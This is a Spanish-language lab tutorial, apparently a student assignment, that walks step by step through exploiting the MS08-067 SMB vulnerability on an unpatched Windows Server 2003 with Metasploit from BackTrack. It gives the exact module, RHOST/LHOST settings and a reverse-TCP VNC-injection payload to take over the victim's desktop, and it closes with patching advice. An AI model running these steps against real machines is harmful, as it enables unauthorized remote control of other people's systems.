Introducción:

Es un tipo de ataque de autentificación remota, lo que significa que permite conectarnos remotamente a algún equipo sin tener los permisos necesarios, esto claro si el sistema operativo posee aquellas vulnerabilidades, como por ejemplo sistemas Windows desactualizados.

Objetivo:

Violar la seguridad de un Sistema Windows conectándonos remotamente a este sin tener los permisos necesarios. Para nuestro ejemplo sera un Windows Server 2003, en ejercicios de pruebas también pudimos atacar de la misma manera a Windows XP.

Herramientas a utilizar:

-BackTrack

-Windows Server 2003

Configuraciones de los equipos:

(Estas direcciones han sido utilizadas para nuestro ejemplo, lo importante para el ataque es que las maquinas se encuentren conectadas en la misma red)

– BackTrack

IP: 192.168.1.5

– Windows Server 2003

IP: 192.168.1.6

Revisión de las configuraciones antes de realizar el ataque:

Nos aseguramos de comprobar las Ips de nuestros equipos.

En BackTrack para conocer nuestra Ip abrimos un terminal y usamos el comando ifconfig

En Windows para conocer nuestra Ip abrimos una consola de cmd y usamos el comando ipconfig

Para verificar que hay conexión entre ambos equipos procedemos a realizar un ping, tanto como desde backtrack a windows como de windows a bactrack.

Para casos ya reales en los que no siempre tendremos acceso a la ip de nuestra victima podemos usar el comando nmap en backtrack, permitiendonos asi explorar la red, ver las maquinas conectadas, sus ips y que sistemas operativos poseen.

Procedimiento para realizar el ataque:

Ya previas revisiones de las direcciones y teniendo en claro lo que vamos a realizar, procedemos a seguir los siguientes pasos:

1) Abrimos un terminal desde BackTrack y usamos el comando msfconsole (este comando abre la interfaz MSF -> Metasploit Framework) y esperamos a que cargue la pantalla de bienvenida a la interfaz.

2) Usamos el comando show exploits (nos muestra las lista de los tipos de ataque disponibles), el comando es simplemente utilizado para recordar que tipo de ataque era el que vamos a usar. Ya que en nuestro caso el tipo de ataque es: windows/smb/ms08_067_netapi

Este paso puede ser omitido si se tiene claro que el tipo de ataque es: windows/smb/ms08_067_netapi

3) Usamos el comando use <tipo_de_ataque>

En nuestro caso seria:  use windows/smb/ms08_067_netapi 

4) Procedemos a setear (configuramos los parametros necesarios para realizar el ataque).

4.1) Seteamos el RHOST (Remote Host, que viene a ser la ip de nuestra victima).

El comando a utilizar es set RHOST <ip_victima>

Para nuestro ejemplo seria set RHOST 192.168.1.6

4.2) Seteamos el LHOST (Local Host, que viene a ser la ip de donde estamos realizando el ataque).

El comando a utilizar es set LHOST <ip_atacante>

Para nuestro ejemplo seria set LHOST 192.168.1.5

4.3) Mostramos los payloads (son los métodos del tipo de ataque seleccionado). Esto lo hacemos si no tenemos claro que payload setear. Pero para nuestro ejemplo sabemos que es: windows/vncinject/reverse_tcp

Entonces procedemos a usar el comando: set payload <metodo_ataque>

Para nuestro ejemplo seria: set payload windows/vncinject/reverse_tcp

5) Una vez configurados los parametros, procedemos a ejecutar el ataque con el comando: exploit

6) Finalmente se abre una interfaz donde podemos ver el escritorio de nuestra victima, hemos tomado el control mediante acceso remoto.

Recomendaciones:

Se recomienda tener todos los parches instalados de Windows XP, o de cualquier Sistema Operativo, así se disminuyen las vulnerabilidades.

Se recomienda actualizar constantemente el Sistema Operativo, para disminuir la vulnerabilidades del mismo.

Se recomienda usar software legal, si las licencias son muy caras, siempre se puede optar por el software libre.

Integrantes:

  • Anthony Filian Vivanco
  • Paul Padilla Sabando
  • Josue Cevallos Bayas
  • Christian Chamba Mendez